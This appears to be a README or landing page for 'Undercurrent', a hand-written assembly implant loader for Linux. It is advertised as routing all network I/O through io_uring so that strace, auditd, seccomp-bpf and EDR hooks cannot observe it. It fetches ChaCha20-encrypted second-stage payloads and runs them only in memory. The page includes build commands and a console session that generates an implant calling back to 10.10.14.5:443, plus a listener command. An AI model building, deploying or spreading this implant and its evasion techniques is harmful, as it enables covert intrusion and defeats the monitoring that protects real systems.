Pure x86-64 NASM assembly implant loader. All I/O through io_uring submission queues. ChaCha20-Poly1305 AEAD encryption. ~4.2KB of position-independent shellcode.
uring> psk generate PSK: a1b2c3...f4e5d6 (256-bit) uring> payload /tmp/stage2.bin loaded 2,048 bytes uring> generate 10.10.14.5 443 /tmp/implant assembled → patched → /tmp/implant (4,218 bytes) uring> listen 443 listening on 0.0.0.0:443 (ChaCha20-Poly1305)
Zero traditional I/O syscalls. Authenticated encryption. Hand-written assembly. No compiler, no runtime, no libc.
All network I/O via io_uring submission/completion queues. Tools that hook the syscall table — strace, auditd, seccomp-bpf, EDR userland hooks — cannot observe the implant's operations.
Full RFC 8439 AEAD from Grotto's pure-assembly crypto. 256-bit PSK, random 12-byte nonces per message. Tampered payloads silently rejected.
Payload received, decrypted, and executed entirely in memory. RW to RX mprotect transition. Never RWX. Zero disk artifacts.
Builds as standalone ELF (~12.7KB) or raw PIC shellcode (~4.2KB) for injection. Same source, two deployment options.
No socket, connect, read, write, send, or recv. Only io_uring_setup, io_uring_enter, mmap, mprotect, getrandom, and close. BPF filters on traditional I/O never fire.
Interactive cmd2+rich REPL with Catppuccin theme. Multi-listener management, session tracking, JSON export, on-the-fly implant generation.
Pure x86_64 assembly io_uring stealth loader with encrypted payload delivery on Linux 5.1+.
Clean separation between orchestration, ring engine, networking, crypto, and staging. Pure hand-written NASM throughout.
Entry point and orchestration. Coordinates the implant lifecycle from ring setup through payload execution to clean teardown.
io_uring engine — ring buffer setup, SQE submission, CQE polling. Maps submission and completion queues via mmap.
TCP connect via IORING_OP_SOCKET/IORING_OP_CONNECT. ChaCha20-Poly1305 AEAD with per-message random nonces from getrandom(2).
Anonymous mmap RW region, decrypt payload in place, mprotect RX, jump to entry. No RWX pages, no disk writes.
NASM + ld. No compiler toolchain. No package manager. Build in seconds.
$ git clone https://github.com/Real-Fruit-Snacks/Undercurrent $ cd Undercurrent $ pip install cmd2 rich cryptography # Build ELF + shellcode $ make elf $ make shellcode $ ls -la build/ uring-implant 12.7K uring-implant.bin 4.2K
# Interactive console $ ./uring-console uring> psk generate uring> payload stage2.bin uring> generate 10.10.14.5 443 /tmp/implant uring> listen 443 # Or command-line $ python3 tools/listener.py \ --lport 443 --payload sc.bin
strace / ltrace — no traditional I/O syscallsauditd — io_uring bypasses audit hooksseccomp-bpf — filters on socket/read/write never fire